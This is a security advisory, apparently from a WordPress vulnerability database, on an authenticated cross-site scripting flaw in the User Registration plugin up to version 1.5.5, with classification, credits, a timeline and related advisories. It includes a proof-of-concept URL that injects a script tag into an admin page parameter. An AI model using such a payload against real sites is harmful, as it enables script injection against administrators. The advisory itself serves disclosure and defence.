User Registration <= 1.5.5 – Authenticated Cross-Site Scripting (XSS)

Description

The User Registration – Custom Registration Form, Login And User Profile For WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://127.0.0.1:8080/wp-admin/admin.php?page=add-new-registration&edit-registration=220%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Affects Plugins

user-registration

Fixed in 1.5.6

References

URL

https://packetstormsecurity.com/files/#151067/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Mr Winst0n

Submitter

Ryan Dewhurst

Submitter twitter

ethicalhack3r

Verified

WPVDB ID

adfa8b40-25d9-4311-92e8-ff09ed778927

Timeline

Publicly Published

2019-01-09 (about 7 years ago)

Added

2019-01-13 (about 7 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2015-05-13

Title

Indieweb Post Kinds <= 1.3.1 - DOM Cross-Site Scripting (XSS)

Published

2025-02-23

Title

Team Section Block < 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-01-19

Title

Interactive Polish Map < 1.2.1 - Admin+ Stored XSS

Published

2014-05-28

Title

Oleggo Livestream <= 0.2.6 - XSS

Published

2022-09-26

Title

Tutor LMS < 2.0.10 - Admin+ Stored Cross-Site Scripting